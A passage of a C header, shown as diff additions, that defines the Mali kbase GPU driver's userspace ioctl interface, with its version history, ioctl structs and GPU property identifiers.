+#include <linux/types.h>
+
+/*
+ * 11.1:
+ * - Add BASE_MEM_TILER_ALIGN_TOP under base_mem_alloc_flags
+ * 11.2:
+ * - KBASE_MEM_QUERY_FLAGS can return KBASE_REG_PF_GROW and KBASE_REG_PROTECTED,
+ *   which some user-side clients prior to 11.2 might fault if they received
+ *   them
+ * 11.3:
+ * - New ioctls KBASE_IOCTL_STICKY_RESOURCE_MAP and
+ *   KBASE_IOCTL_STICKY_RESOURCE_UNMAP
+ * 11.4:
+ * - New ioctl KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET
+ * 11.5:
+ * - New ioctl: KBASE_IOCTL_MEM_JIT_INIT (old ioctl renamed to _OLD)
+ * 11.6:
+ * - Added flags field to base_jit_alloc_info structure, which can be used to
+ *   specify pseudo chunked tiler alignment for JIT allocations.
+ * 11.7:
+ * - Removed UMP support
+ * 11.8:
+ * - Added BASE_MEM_UNCACHED_GPU under base_mem_alloc_flags
+ * 11.9:
+ * - Added BASE_MEM_PERMANENT_KERNEL_MAPPING and BASE_MEM_FLAGS_KERNEL_ONLY
+ *   under base_mem_alloc_flags
+ * 11.10:
+ * - Enabled the use of nr_extres field of base_jd_atom_v2 structure for
+ *   JIT_ALLOC and JIT_FREE type softjobs to enable multiple JIT allocations
+ *   with one softjob.
+ * 11.11:
+ * - Added BASE_MEM_GPU_VA_SAME_4GB_PAGE under base_mem_alloc_flags
+ * 11.12:
+ * - Removed ioctl: KBASE_IOCTL_GET_PROFILING_CONTROLS
+ * 11.13:
+ * - New ioctl: KBASE_IOCTL_MEM_EXEC_INIT
+ * 11.14:
+ * - Add BASE_MEM_GROUP_ID_MASK, base_mem_group_id_get, base_mem_group_id_set
+ *   under base_mem_alloc_flags
+ * 11.15:
+ * - Added BASEP_CONTEXT_MMU_GROUP_ID_MASK under base_context_create_flags.
+ * - Require KBASE_IOCTL_SET_FLAGS before BASE_MEM_MAP_TRACKING_HANDLE can be
+ *   passed to mmap().
+ * 11.16:
+ * - Extended ioctl KBASE_IOCTL_MEM_SYNC to accept imported dma-buf.
+ * - Modified (backwards compatible) ioctl KBASE_IOCTL_MEM_IMPORT behavior for
+ *   dma-buf. Now, buffers are mapped on GPU when first imported, no longer
+ *   requiring external resource or sticky resource tracking. UNLESS,
+ *   CONFIG_MALI_DMA_BUF_MAP_ON_DEMAND is enabled.
+ * 11.17:
+ * - Added BASE_JD_REQ_JOB_SLOT.
+ * - Reused padding field in base_jd_atom_v2 to pass job slot number.
+ * - New ioctl: KBASE_IOCTL_GET_CPU_GPU_TIMEINFO
+ * 11.18:
+ * - Added BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP under base_mem_alloc_flags
+ * 11.19:
+ * - Extended base_jd_atom_v2 to allow a renderpass ID to be specified.
+ * 11.20:
+ * - Added new phys_pages member to kbase_ioctl_mem_jit_init for
+ *   KBASE_IOCTL_MEM_JIT_INIT, previous variants of this renamed to use _10_2
+ *   (replacing '_OLD') and _11_5 suffixes
+ * - Replaced compat_core_req (deprecated in 10.3) with jit_id[2] in
+ *   base_jd_atom_v2. It must currently be initialized to zero.
+ * - Added heap_info_gpu_addr to base_jit_alloc_info, and
+ *   BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE allowable in base_jit_alloc_info's
+ *   flags member. Previous variants of this structure are kept and given _10_2
+ *   and _11_5 suffixes.
+ * - The above changes are checked for safe values in usual builds
+ * 11.21:
+ * - v2.0 of mali_trace debugfs file, which now versions the file separately
+ * 11.22:
+ * - Added base_jd_atom (v3), which is seq_nr + base_jd_atom_v2.
+ *   KBASE_IOCTL_JOB_SUBMIT supports both in parallel.
+ * 11.23:
+ * - Modified KBASE_IOCTL_MEM_COMMIT behavior to reject requests to modify
+ *   the physical memory backing of JIT allocations. This was not supposed
+ *   to be a valid use case, but it was allowed by the previous implementation.
+ * 11.24:
+ * - Added a sysfs file 'serialize_jobs' inside a new sub-directory
+ *   'scheduling'.
+ * 11.25: + * - Enabled JIT pressure limit in base/kbase by default + * 11.26 + * - Added kinstr_jm API + * 11.27 + * - Backwards compatible extension to HWC ioctl. + * 11.28: + * - Added kernel side cache ops needed hint + * 11.29: + * - Reserve ioctl 52 + * 11.30: + * - Add a new priority level BASE_JD_PRIO_REALTIME + * - Add ioctl 54: This controls the priority setting. + * 11.31: + * - Added BASE_JD_REQ_LIMITED_CORE_MASK. + * - Added ioctl 55: set_limited_core_count. + */ +#define BASE_UK_VERSION_MAJOR 11 +#define BASE_UK_VERSION_MINOR 31 + +/** + * struct kbase_ioctl_version_check - Check version compatibility between + * kernel and userspace + * + * @major: Major version number + * @minor: Minor version number + */ +struct kbase_ioctl_version_check { + __u16 major; + __u16 minor; +}; + +#define KBASE_IOCTL_VERSION_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check) + + +/** + * struct kbase_ioctl_job_submit - Submit jobs/atoms to the kernel + * + * @addr: Memory address of an array of struct base_jd_atom_v2 or v3 + * @nr_atoms: Number of entries in the array + * @stride: sizeof(struct base_jd_atom_v2) or sizeof(struct base_jd_atom) + */ +struct kbase_ioctl_job_submit { + __u64 addr; + __u32 nr_atoms; + __u32 stride; +}; + +#define KBASE_IOCTL_JOB_SUBMIT \ + _IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit) + +#define KBASE_IOCTL_POST_TERM \ + _IO(KBASE_IOCTL_TYPE, 4) + +/** + * struct kbase_ioctl_soft_event_update - Update the status of a soft-event + * @event: GPU address of the event which has been updated + * @new_status: The new status to set + * @flags: Flags for future expansion + */ +struct kbase_ioctl_soft_event_update { + __u64 event; + __u32 new_status; + __u32 flags; +}; + +#define KBASE_IOCTL_SOFT_EVENT_UPDATE \ + _IOW(KBASE_IOCTL_TYPE, 28, struct kbase_ioctl_soft_event_update) + +/** + * struct kbase_kinstr_jm_fd_out - Explains the compatibility information for + * the `struct kbase_kinstr_jm_atom_state_change` structure returned from the + * kernel + * + * @size: The size of the `struct kbase_kinstr_jm_atom_state_change` + * @version: Represents a breaking change in the + * `struct kbase_kinstr_jm_atom_state_change` + * @padding: Explicit padding to get the structure up to 64bits. See + * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst + * + * The `struct kbase_kinstr_jm_atom_state_change` may have extra members at the + * end of the structure that older user space might not understand. If the + * `version` is the same, the structure is still compatible with newer kernels. + * The `size` can be used to cast the opaque memory returned from the kernel. + */ +struct kbase_kinstr_jm_fd_out { + __u16 size; + __u8 version; + __u8 padding[5]; +}; + +/** + * struct kbase_kinstr_jm_fd_in - Options when creating the file descriptor + * + * @count: Number of atom states that can be stored in the kernel circular + * buffer. Must be a power of two + * @padding: Explicit padding to get the structure up to 64bits. 
See + * https://www.kernel.org/doc/Documentation/ioctl/botching-up-ioctls.rst + */ +struct kbase_kinstr_jm_fd_in { + __u16 count; + __u8 padding[6]; +}; + +union kbase_kinstr_jm_fd { + struct kbase_kinstr_jm_fd_in in; + struct kbase_kinstr_jm_fd_out out; +}; + +#define KBASE_IOCTL_KINSTR_JM_FD \ + _IOWR(KBASE_IOCTL_TYPE, 51, union kbase_kinstr_jm_fd) + + +#define KBASE_IOCTL_VERSION_CHECK_RESERVED \ + _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check) + +#define KBASE_IOCTL_TYPE 0x80 + +/** + * struct kbase_ioctl_set_flags - Set kernel context creation flags + * + * @create_flags: Flags - see base_context_create_flags + */ +struct kbase_ioctl_set_flags { + __u32 create_flags; +}; + +#define KBASE_IOCTL_SET_FLAGS \ + _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags) + +/** + * struct kbase_ioctl_get_gpuprops - Read GPU properties from the kernel + * + * @buffer: Pointer to the buffer to store properties into + * @size: Size of the buffer + * @flags: Flags - must be zero for now + * + * The ioctl will return the number of bytes stored into @buffer or an error + * on failure (e.g. @size is too small). If @size is specified as 0 then no + * data will be written but the return value will be the number of bytes needed + * for all the properties. + * + * @flags may be used in the future to request a different format for the + * buffer. With @flags == 0 the following format is used. + * + * The buffer will be filled with pairs of values, a __u32 key identifying the + * property followed by the value. The size of the value is identified using + * the bottom bits of the key. The value then immediately followed the key and + * is tightly packed (there is no padding). All keys and values are + * little-endian. + * + * 00 = __u8 + * 01 = __u16 + * 10 = __u32 + * 11 = __u64 + */ +struct kbase_ioctl_get_gpuprops { + __u64 buffer; + __u32 size; + __u32 flags; +}; + +#define KBASE_IOCTL_GET_GPUPROPS \ + _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops) + +/** + * union kbase_ioctl_mem_alloc - Allocate memory on the GPU + * @in: Input parameters + * @in.va_pages: The number of pages of virtual address space to reserve + * @in.commit_pages: The number of physical pages to allocate + * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region + * @in.flags: Flags + * @out: Output parameters + * @out.flags: Flags + * @out.gpu_va: The GPU virtual address which is allocated + */ +union kbase_ioctl_mem_alloc { + struct { + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u64 flags; + } in; + struct { + __u64 flags; + __u64 gpu_va; + } out; +}; + +#define KBASE_IOCTL_MEM_ALLOC \ + _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc) + +/** + * struct kbase_ioctl_mem_query - Query properties of a GPU memory region + * @in: Input parameters + * @in.gpu_addr: A GPU address contained within the region + * @in.query: The type of query + * @out: Output parameters + * @out.value: The result of the query + * + * Use a %KBASE_MEM_QUERY_xxx flag as input for @query. 
+ */ +union kbase_ioctl_mem_query { + struct { + __u64 gpu_addr; + __u64 query; + } in; + struct { + __u64 value; + } out; +}; + +#define KBASE_IOCTL_MEM_QUERY \ + _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query) + +#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1) +#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2) +#define KBASE_MEM_QUERY_FLAGS ((__u64)3) + +/** + * struct kbase_ioctl_mem_free - Free a memory region + * @gpu_addr: Handle to the region to free + */ +struct kbase_ioctl_mem_free { + __u64 gpu_addr; +}; + +#define KBASE_IOCTL_MEM_FREE \ + _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free) + +/** + * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader + * @buffer_count: requested number of dumping buffers + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + * + * A fd is returned from the ioctl if successful, or a negative value on error + */ +struct kbase_ioctl_hwcnt_reader_setup { + __u32 buffer_count; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_READER_SETUP \ + _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup) + +/** + * struct kbase_ioctl_hwcnt_enable - Enable hardware counter collection + * @dump_buffer: GPU address to write counters to + * @fe_bm: counters selection bitmask (Front end) + * @shader_bm: counters selection bitmask (Shader) + * @tiler_bm: counters selection bitmask (Tiler) + * @mmu_l2_bm: counters selection bitmask (MMU_L2) + */ +struct kbase_ioctl_hwcnt_enable { + __u64 dump_buffer; + __u32 fe_bm; + __u32 shader_bm; + __u32 tiler_bm; + __u32 mmu_l2_bm; +}; + +#define KBASE_IOCTL_HWCNT_ENABLE \ + _IOW(KBASE_IOCTL_TYPE, 9, struct kbase_ioctl_hwcnt_enable) + +#define KBASE_IOCTL_HWCNT_DUMP \ + _IO(KBASE_IOCTL_TYPE, 10) + +#define KBASE_IOCTL_HWCNT_CLEAR \ + _IO(KBASE_IOCTL_TYPE, 11) + +/** + * struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to. + * @data: Counter samples for the dummy model. + * @size: Size of the counter sample data. + * @padding: Padding. + */ +struct kbase_ioctl_hwcnt_values { + __u64 data; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_HWCNT_SET \ + _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values) + +/** + * struct kbase_ioctl_disjoint_query - Query the disjoint counter + * @counter: A counter of disjoint events in the kernel + */ +struct kbase_ioctl_disjoint_query { + __u32 counter; +}; + +#define KBASE_IOCTL_DISJOINT_QUERY \ + _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query) + +/** + * struct kbase_ioctl_get_ddk_version - Query the kernel version + * @version_buffer: Buffer to receive the kernel version string + * @size: Size of the buffer + * @padding: Padding + * + * The ioctl will return the number of bytes written into version_buffer + * (which includes a NULL byte) or a negative error code + * + * The ioctl request code has to be _IOW because the data in ioctl struct is + * being copied to the kernel, even though the kernel then writes out the + * version info to the buffer specified in the ioctl. 
+ */ +struct kbase_ioctl_get_ddk_version { + __u64 version_buffer; + __u32 size; + __u32 padding; +}; + +#define KBASE_IOCTL_GET_DDK_VERSION \ + _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version) + +/** + * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 10.2--11.4) + * @va_pages: Number of VA pages to reserve for JIT + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_10_2 { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2) + +/** + * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory + * allocator (between kernel driver + * version 11.5--11.19) + * @va_pages: Number of VA pages to reserve for JIT + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + * + * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for + * backwards compatibility. + */ +struct kbase_ioctl_mem_jit_init_11_5 { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5) + +/** + * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory + * allocator + * @va_pages: Number of GPU virtual address pages to reserve for just-in-time + * memory allocations + * @max_allocations: Maximum number of concurrent allocations + * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%) + * @group_id: Group ID to be used for physical allocations + * @padding: Currently unused, must be zero + * @phys_pages: Maximum number of physical pages to allocate just-in-time + * + * Note that depending on the VA size of the application and GPU, the value + * specified in @va_pages may be ignored. + */ +struct kbase_ioctl_mem_jit_init { + __u64 va_pages; + __u8 max_allocations; + __u8 trim_level; + __u8 group_id; + __u8 padding[5]; + __u64 phys_pages; +}; + +#define KBASE_IOCTL_MEM_JIT_INIT \ + _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init) + +/** + * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory + * + * @handle: GPU memory handle (GPU VA) + * @user_addr: The address where it is mapped in user space + * @size: The number of bytes to synchronise + * @type: The direction to synchronise: 0 is sync to memory (clean), + * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants. 
+ * @padding: Padding to round up to a multiple of 8 bytes, must be zero + */ +struct kbase_ioctl_mem_sync { + __u64 handle; + __u64 user_addr; + __u64 size; + __u8 type; + __u8 padding[7]; +}; + +#define KBASE_IOCTL_MEM_SYNC \ + _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync) + +/** + * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer + * + * @in: Input parameters + * @in.gpu_addr: The GPU address of the memory region + * @in.cpu_addr: The CPU address to locate + * @in.size: A size in bytes to validate is contained within the region + * @out: Output parameters + * @out.offset: The offset from the start of the memory region to @cpu_addr + */ +union kbase_ioctl_mem_find_cpu_offset { + struct { + __u64 gpu_addr; + __u64 cpu_addr; + __u64 size; + } in; + struct { + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset) + +/** + * struct kbase_ioctl_get_context_id - Get the kernel context ID + * + * @id: The kernel context ID + */ +struct kbase_ioctl_get_context_id { + __u32 id; +}; + +#define KBASE_IOCTL_GET_CONTEXT_ID \ + _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id) + +/** + * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd + * + * @flags: Flags + * + * The ioctl returns a file descriptor when successful + */ +struct kbase_ioctl_tlstream_acquire { + __u32 flags; +}; + +#define KBASE_IOCTL_TLSTREAM_ACQUIRE \ + _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire) + +#define KBASE_IOCTL_TLSTREAM_FLUSH \ + _IO(KBASE_IOCTL_TYPE, 19) + +/** + * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region + * + * @gpu_addr: The memory region to modify + * @pages: The number of physical pages that should be present + * + * The ioctl may return on the following error codes or 0 for success: + * -ENOMEM: Out of memory + * -EINVAL: Invalid arguments + */ +struct kbase_ioctl_mem_commit { + __u64 gpu_addr; + __u64 pages; +}; + +#define KBASE_IOCTL_MEM_COMMIT \ + _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit) + +/** + * union kbase_ioctl_mem_alias - Create an alias of memory regions + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.stride: Bytes between start of each memory region + * @in.nents: The number of regions to pack together into the alias + * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_alias { + struct { + __u64 flags; + __u64 stride; + __u64 nents; + __u64 aliasing_info; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_ALIAS \ + _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias) + +enum base_mem_import_type { + BASE_MEM_IMPORT_TYPE_INVALID = 0, + /* + * Import type with value 1 is deprecated. + */ + BASE_MEM_IMPORT_TYPE_UMM = 2, + BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3 +}; + +/** + * struct base_mem_import_user_buffer - Handle of an imported user buffer + * + * @ptr: address of imported user buffer + * @length: length of imported user buffer in bytes + * + * This structure is used to represent a handle of an imported user buffer. 
+ */ + +struct base_mem_import_user_buffer { + __u64 ptr; + __u64 length; +}; + +/** + * union kbase_ioctl_mem_import - Import memory for use by the GPU + * @in: Input parameters + * @in.flags: Flags, see BASE_MEM_xxx + * @in.phandle: Handle to the external memory + * @in.type: Type of external memory, see base_mem_import_type + * @in.padding: Amount of extra VA pages to append to the imported buffer + * @out: Output parameters + * @out.flags: Flags, see BASE_MEM_xxx + * @out.gpu_va: Address of the new alias + * @out.va_pages: Size of the new alias + */ +union kbase_ioctl_mem_import { + struct { + __u64 flags; + __u64 phandle; + __u32 type; + __u32 padding; + } in; + struct { + __u64 flags; + __u64 gpu_va; + __u64 va_pages; + } out; +}; + +#define KBASE_IOCTL_MEM_IMPORT \ + _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import) + +/** + * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region + * @gpu_va: The GPU region to modify + * @flags: The new flags to set + * @mask: Mask of the flags to modify + */ +struct kbase_ioctl_mem_flags_change { + __u64 gpu_va; + __u64 flags; + __u64 mask; +}; + +#define KBASE_IOCTL_MEM_FLAGS_CHANGE \ + _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change) + +/** + * struct kbase_ioctl_stream_create - Create a synchronisation stream + * @name: A name to identify this stream. Must be NULL-terminated. + * + * Note that this is also called a "timeline", but is named stream to avoid + * confusion with other uses of the word. + * + * Unused bytes in @name (after the first NULL byte) must be also be NULL bytes. + * + * The ioctl returns a file descriptor. + */ +struct kbase_ioctl_stream_create { + char name[32]; +}; + +#define KBASE_IOCTL_STREAM_CREATE \ + _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create) + +/** + * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence + * @fd: The file descriptor to validate + */ +struct kbase_ioctl_fence_validate { + int fd; +}; + +#define KBASE_IOCTL_FENCE_VALIDATE \ + _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate) + +/** + * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel + * @buffer: Pointer to the information + * @len: Length + * @padding: Padding + * + * The data provided is accessible through a debugfs file + */ +struct kbase_ioctl_mem_profile_add { + __u64 buffer; + __u32 len; + __u32 padding; +}; + +#define KBASE_IOCTL_MEM_PROFILE_ADD \ + _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add) + +/** + * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to map + */ +struct kbase_ioctl_sticky_resource_map { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_MAP \ + _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map) + +/** + * struct kbase_ioctl_sticky_resource_map - Unmap a resource mapped which was + * previously permanently mapped + * @count: Number of resources + * @address: Array of __u64 GPU addresses of the external resources to unmap + */ +struct kbase_ioctl_sticky_resource_unmap { + __u64 count; + __u64 address; +}; + +#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \ + _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap) + +/** + * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of + * the GPU memory region for + * the given gpu address and + * the offset of that address + * into the region + * @in: Input 
parameters + * @in.gpu_addr: GPU virtual address + * @in.size: Size in bytes within the region + * @out: Output parameters + * @out.start: Address of the beginning of the memory region enclosing @gpu_addr + * for the length of @offset bytes + * @out.offset: The offset from the start of the memory region to @gpu_addr + */ +union kbase_ioctl_mem_find_gpu_start_and_offset { + struct { + __u64 gpu_addr; + __u64 size; + } in; + struct { + __u64 start; + __u64 offset; + } out; +}; + +#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \ + _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset) + +#define KBASE_IOCTL_CINSTR_GWT_START \ + _IO(KBASE_IOCTL_TYPE, 33) + +#define KBASE_IOCTL_CINSTR_GWT_STOP \ + _IO(KBASE_IOCTL_TYPE, 34) + +/** + * union kbase_ioctl_gwt_dump - Used to collect all GPU write fault addresses. + * @in: Input parameters + * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas. + * @in.size_buffer: Address of buffer to hold size of modified areas (in pages) + * @in.len: Number of addresses the buffers can hold. + * @in.padding: padding + * @out: Output parameters + * @out.no_of_addr_collected: Number of addresses collected into addr_buffer. + * @out.more_data_available: Status indicating if more addresses are available. + * @out.padding: padding + * + * This structure is used when performing a call to dump GPU write fault + * addresses. + */ +union kbase_ioctl_cinstr_gwt_dump { + struct { + __u64 addr_buffer; + __u64 size_buffer; + __u32 len; + __u32 padding; + + } in; + struct { + __u32 no_of_addr_collected; + __u8 more_data_available; + __u8 padding[27]; + } out; +}; + +#define KBASE_IOCTL_CINSTR_GWT_DUMP \ + _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump) + +/** + * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone + * + * @va_pages: Number of VA pages to reserve for EXEC_VA + */ +struct kbase_ioctl_mem_exec_init { + __u64 va_pages; +}; + +#define KBASE_IOCTL_MEM_EXEC_INIT \ + _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init) + +/** + * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of + * cpu/gpu time (counter values) + * @in: Input parameters + * @in.request_flags: Bit-flags indicating the requested types. + * @in.paddings: Unused, size alignment matching the out. + * @out: Output parameters + * @out.sec: Integer field of the monotonic time, unit in seconds. + * @out.nsec: Fractional sec of the monotonic time, in nano-seconds. + * @out.padding: Unused, for __u64 alignment + * @out.timestamp: System wide timestamp (counter) value. + * @out.cycle_counter: GPU cycle counter value. + */ +union kbase_ioctl_get_cpu_gpu_timeinfo { + struct { + __u32 request_flags; + __u32 paddings[7]; + } in; + struct { + __u64 sec; + __u32 nsec; + __u32 padding; + __u64 timestamp; + __u64 cycle_counter; + } out; +}; + +#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \ + _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo) + +/** + * struct kbase_ioctl_context_priority_check - Check the max possible priority + * @priority: Input priority & output priority + */ + +struct kbase_ioctl_context_priority_check { + __u8 priority; +}; + +#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \ + _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check) + +/** + * struct kbase_ioctl_set_limited_core_count - Set the limited core count. 
+ * + * @max_core_count: Maximum core count + */ +struct kbase_ioctl_set_limited_core_count { + __u8 max_core_count; +}; + +#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \ + _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count) + + +/*************** + * Pixel ioctls * + ***************/ + +/** + * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request + * + * @dur_usec: Duration for GPU to stay awake. + */ +struct kbase_ioctl_apc_request { + __u32 dur_usec; +}; + +#define KBASE_IOCTL_APC_REQUEST \ + _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request) + +/*************** + * test ioctls * + ***************/ +#if MALI_UNIT_TEST +/* These ioctls are purely for test purposes and are not used in the production + * driver, they therefore may change without notice + */ + +#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1) + + +/** + * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes + * @bytes_collected: number of bytes read by user + * @bytes_generated: number of bytes generated by tracepoints + */ +struct kbase_ioctl_tlstream_stats { + __u32 bytes_collected; + __u32 bytes_generated; +}; + +#define KBASE_IOCTL_TLSTREAM_STATS \ + _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats) + +#endif /* MALI_UNIT_TEST */ + +/* Customer extension range */ +#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2) + +/* If the integration needs extra ioctl add them there + * like this: + * + * struct my_ioctl_args { + * .... + * } + * + * #define KBASE_IOCTL_MY_IOCTL \ + * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args) + */ + + +/********************************** + * Definitions for GPU properties * + **********************************/ +#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0) +#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1) +#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2) +#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3) + +#define KBASE_GPUPROP_PRODUCT_ID 1 +#define KBASE_GPUPROP_VERSION_STATUS 2 +#define KBASE_GPUPROP_MINOR_REVISION 3 +#define KBASE_GPUPROP_MAJOR_REVISION 4 +/* 5 previously used for GPU speed */ +#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6 +/* 7 previously used for minimum GPU speed */ +#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8 +#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9 +#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10 +#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11 +#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12 + +#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13 +#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14 +#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15 + +#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16 +#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17 + +#define KBASE_GPUPROP_MAX_THREADS 18 +#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19 +#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20 +#define KBASE_GPUPROP_MAX_REGISTERS 21 +#define KBASE_GPUPROP_MAX_TASK_QUEUE 22 +#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23 +#define KBASE_GPUPROP_IMPL_TECH 24 + +#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25 +#define KBASE_GPUPROP_RAW_TILER_PRESENT 26 +#define KBASE_GPUPROP_RAW_L2_PRESENT 27 +#define KBASE_GPUPROP_RAW_STACK_PRESENT 28 +#define KBASE_GPUPROP_RAW_L2_FEATURES 29 +#define KBASE_GPUPROP_RAW_CORE_FEATURES 30 +#define KBASE_GPUPROP_RAW_MEM_FEATURES 31 +#define KBASE_GPUPROP_RAW_MMU_FEATURES 32 +#define 